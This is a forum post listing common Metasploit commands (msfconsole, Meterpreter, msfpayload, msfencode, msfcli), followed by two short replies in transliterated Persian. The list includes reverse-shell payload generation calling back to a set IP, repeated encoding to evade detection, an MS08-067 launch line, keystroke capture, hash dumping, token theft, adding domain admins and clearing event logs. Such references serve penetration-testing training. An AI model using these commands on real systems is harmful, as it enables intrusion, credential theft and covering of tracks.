دستورات کامل msf

This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

MSFconsole Commands:

Select All
Code:
show exploits
Show all exploits within the Framework.

Select All
Code:
show payloads
Show all payloads within the Framework.

Select All
Code:
show auxiliary
Show all auxiliary modules within the Framework.


Select All
Code:
search name
Search for exploits or modules within the Framework.

Select All
Code:
info
Load information about a specific exploit or module.

Select All
Code:
use name
Load an exploit or module (example: use windows/smb/.....).

Select All
Code:
LHOST
Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

Select All
Code:
RHOST
The remote host or the target.

Select All
Code:
set function
Set a specific value (for example, LHOST or RHOST).

Select All
Code:
setg function
Set a specific value globally (for example, LHOST or RHOST).

Select All
Code:
show options
Show the options available for a module or exploit.

Select All
Code:
show targets
Show the platforms supported by the exploit.

Select All
Code:
set target num
Specify a specific target index if you know the OS and service pack.

Select All
Code:
set payload payload
Specify the payload to use.

Select All
Code:
show advanced
Show advanced options.

Select All
Code:
set autorunscript migrate -f
Automatically migrate to a separate process upon exploit completion.

Select All
Code:
check
Determine whether a target is vulnerable to an attack.

Select All
Code:
exploit
Execute the module or exploit and attack the target.exploit -j
Run the exploit under the context of the job. (This will run the exploit in the background.)

Select All
Code:
exploit -z
Do not interact with the session after successful exploitation.

Select All
Code:
exploit -e encoder
Specify the payload encoder to use (example: exploit –e shikata_ga_nai).

Select All
Code:
exploit -h
Display help for the exploit command.

Select All
Code:
sessions -l
List available sessions (used when handling multiple shells).

Select All
Code:
sessions -l -v
List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

Select All
Code:
sessions -s script
Run a specific Meterpreter script on all Meterpreter live sessions.

Select All
Code:
sessions -K
Kill all live sessions.

Select All
Code:
sessions -c cmd
Execute a command on all live Meterpreter sessions.

Select All
Code:
sessions -u sessionID
Upgrade a normal Win32 shell to a Meterpreter console.

Select All
Code:
db_create name
Create a database to use with database-driven attacks (example: db_create autopwn).

Select All
Code:
db_connect name
Create and connect to a database for driven attacks (example: db_connect autopwn).

Select All
Code:
db_nmap
Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)

Select All
Code:
db_autopwn -h
Display help for using db_autopwn.

Select All
Code:
db_autopwn -p -r -e
Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.

Select All
Code:
db_destroy
Delete the current database.

Select All
Code:
db_destroy user:password@host:p.o.r.t/database
Delete database using advanced options.

Meterpreter Commands help:
Open Meterpreter usage help.

Select All
Code:
run scriptname
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.

Select All
Code:
sysinfo
Show the system information on the compromised target.

Select All
Code:
ls
List the files and folders on the target.

Select All
Code:
use priv
Load the privilege extension for extended Meterpreter libraries.

Select All
Code:
ps
Show all running processes and which accounts are associated with each process.

Select All
Code:
migrate PID
Migrate to the specific process ID (PID is the target process ID gained from the ps command).

Select All
Code:
use incognito
Load incognito functions. (Used for token stealing and impersonation on a target machine.)

Select All
Code:
list_tokens -u
List available tokens on the target by user.

Select All
Code:
list_tokens -g
List available tokens on the target by group.

Select All
Code:
impersonate_token DOMAIN_NAME\\USERNAME
Impersonate a token available on the target.

Select All
Code:
steal_token PID
Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.

Select All
Code:
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

Select All
Code:
shell
Drop into an interactive shell with all available tokens.

Select All
Code:
execute -f cmd.exe -i
Execute cmd.exe and interact with it.

Select All
Code:
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens.

Select All
Code:
execute -f cmd.exe -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.

Select All
Code:
rev2self
Revert back to the original user you used to compromise the target.

Select All
Code:
reg command
Interact, create, delete, query, set, and much more in the target’s registry.

Select All
Code:
setdesktop number
Switch to a different screen based on who is logged in.

Select All
Code:
screenshot
Take a screenshot of the target’s screen.

Select All
Code:
upload file
Upload a file to the target.

Select All
Code:
download file
Download a file from the target.

Select All
Code:
keyscan_start
Start sniffing keystrokes on the remote target.

Select All
Code:
keyscan_dump
Dump the remote keys captured on the target.

Select All
Code:
keyscan_stop
Stop sniffing keystrokes on the remote target.

Select All
Code:
getprivs
Get as many privileges as possible on the target.

Select All
Code:
uictl enable keyboard/mouse
Take control of the keyboard and/or mouse.

Select All
Code:
background
Run your current Meterpreter shell in the background.

Select All
Code:
hashdump
Dump all hashes on the target.

Select All
Code:
use sniffer
Load the sniffer module.

Select All
Code:
sniffer_interfaces
List the available interfaces on the target.

Select All
Code:
sniffer_dump interfaceID pcapname
Start sniffing on the remote target.

Select All
Code:
sniffer_start interfaceID packet-buffer
Start sniffing with a specific range for a packet buffer.

Select All
Code:
sniffer_stats interfaceID
Grab statistical information from the interface you are sniffing.

Select All
Code:
sniffer_stop interfaceID
Stop the sniffer.

Select All
Code:
add_user username password -h ip
Add a user on the remote target.

Select All
Code:
add_group_user "Domain Admins" username -h ip
Add a username to the Domain Administrators group on the remote target.

Select All
Code:
clearev
Clear the event log on the target machine.

Select All
Code:
timestomp
Change file attributes, such as creation date (antiforensics measure).

Select All
Code:
reboot
Reboot the target machine.

MSFpayload Commands:

Select All
Code:
msfpayload -h
List available payloads.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp O
List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).

Select All
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on p.o.r.t 443, and then save it as a Windows Portable Executable named payload.exe.

Select All
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
Same as above, but export as raw format. This will be used later in msfencode

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript.

MSFencode Commands:

Select All
Code:
msfencode -h
Display the msfencode help.

Select All
Code:
msfencode -l
List the available encoders.

Select All
Code:
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
Format to display the encoded buffer.

Select All
Code:
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.

Select All
Code:
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
Create a multi-encoded payload.

Select All
Code:
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.

MSFcli Commands:

Select All
Code:
msfcli | grep exploit
Show only exploits.

Select All
Code:
msfcli | grep exploit/windows
Show only Windows exploits.

Select All
Code:
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on p.o.r.t 443

mishe yeki tozih bede be che kari miad ini ke reza dade?

msf hamun metasploite ke sazgarie bishtari tu linux dare behtar bud beja bind tcp az reverse_tcp estefade mikardi
exploite netapi dg ro porte 445 javab nemide
aksare payloada ham masalan meterpreter ejra nemishe ru systeme ba kuchiktarin firewall